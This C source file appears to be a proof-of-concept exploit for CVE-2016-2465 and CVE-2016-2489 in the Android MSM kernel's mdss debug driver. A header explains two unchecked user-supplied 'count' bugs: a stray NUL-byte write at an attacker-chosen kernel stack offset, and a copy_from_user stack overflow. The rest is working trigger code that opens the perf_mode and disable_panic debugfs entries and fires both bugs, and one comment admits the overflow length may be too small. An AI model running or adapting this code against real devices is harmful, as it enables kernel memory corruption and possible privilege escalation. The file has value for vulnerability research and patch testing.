/**
*
*This debug driver exports a series of read/write debugfs entries. A few of them contain trivially exploitable bugs, both rooted in a user-supplied "count" that is never bounds-checked.
*
*Kernel stack write at a user-controlled offset (a single NUL byte):
*
*https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#764
*
*The function mdss_debug_perf_mode_read() fails to bounds-check the user-provided "count". The function creates a fixed-size buffer on the stack, then on line 777 attempts to NUL-terminate that buffer but indexes it with the unchecked count:
*
*buf[count] = 0;
*
*Because the write is a single zero byte at an attacker-chosen offset from a kernel stack buffer, an adversary could clobber the saved return address or a nearby function pointer.
*
*
*
*
* Kernel stack buffer overflow:
*
*https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#870
*
*The function mdss_debug_perf_panic_write() once again fails to validate the "count" variable provided from userland, and then passes that count to a copy_from_user() into a stack-based buffer (line 880):
*
*if (copy_from_user(buf, user_buf, count))
*return -EFAULT;
* CVE-2016-2465 And CVE-2016-2489.c
* https://code.google.com/p/android/issues/detail?id=201497
*
*
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
/**
*
* https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#777
*
*/
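/**
 * Trigger the unchecked "count" in mdss_debug_perf_mode_read() (see the
 * header comment): read() from the perf_mode debugfs entry with a
 * user-controlled length of 0x655350 bytes so that the kernel-side
 * `buf[count] = 0` indexes past its stack buffer.
 *
 * The destination is an anonymous private mapping of exactly that size,
 * so the only out-of-range quantity is the count handed to the kernel.
 * Requires access to debugfs (normally root / a debug build).
 *
 * No return value.  An mmap() failure is fatal (exit), as before; an
 * open()/read() failure is now reported instead of silently ignored,
 * and the mapping is released before returning.
 */
static void doMdssPerfModeReadArbWrite(void)
{
	const size_t len = 0x655350;
	void *buf = mmap(NULL, len, PROT_READ | PROT_WRITE,
			 MAP_ANON | MAP_PRIVATE, -1, 0);
	if (buf == MAP_FAILED) {
		printf("Failed to get some vaddr with %s\n", strerror(errno));
		exit(EXIT_FAILURE);
	}

	/* 0 is a valid descriptor; only -1 signals failure. */
	int fd = open("/sys/kernel/debug/mdp/perf_mode", O_RDONLY);
	if (fd < 0) {
		printf("open(perf_mode) failed with %s\n", strerror(errno));
	} else {
		/* The oversized count is the trigger; the return is only informational. */
		ssize_t ret = read(fd, buf, len);
		if (ret < 0)
			printf("read(perf_mode) failed with %s\n", strerror(errno));
		else
			printf("read(perf_mode) returned %zd\n", ret);
		close(fd);
	}

	munmap(buf, len);
}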
/**
*
*
* https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#880
*
*/
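/**
 * Trigger the unchecked "count" in mdss_debug_perf_panic_write() (see the
 * header comment): write() a fixed payload to the disable_panic debugfs
 * entry so that the kernel-side copy_from_user(buf, user_buf, count)
 * copies the full, unvalidated count into its stack buffer.
 *
 * The payload is a newline followed by zeros; only its length matters.
 * NOTE(review): the length is sizeof(payload) == 32.  Whether that
 * exceeds the kernel buffer depends on the driver version referenced
 * above — confirm against line 880 before relying on this size.
 * Requires access to debugfs (normally root / a debug build).
 *
 * No return value.  An open()/write() failure is reported on stdout
 * instead of being silently ignored.
 */
static void doMdssPanicWriteOverflow(void)
{
	char payload[32] = { 0xA };

	/* 0 is a valid descriptor; only -1 signals failure. */
	int fd = open("/sys/kernel/debug/mdp/perf/disable_panic", O_WRONLY);
	if (fd < 0) {
		printf("open(disable_panic) failed with %s\n", strerror(errno));
		return;
	}

	ssize_t ret = write(fd, payload, sizeof(payload));
	if (ret < 0)
		printf("write(disable_panic) failed with %s\n", strerror(errno));
	else
		printf("write(disable_panic) returned %zd\n", ret);
	close(fd);
}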
/*
 * Entry point: fire the write-side trigger (disable_panic) first, then
 * the read-side one (perf_mode).  Both helpers report their own errors;
 * the process exit status is always success.
 */
int main(void)
{
	doMdssPanicWriteOverflow();
	doMdssPerfModeReadArbWrite();
	return EXIT_SUCCESS;
}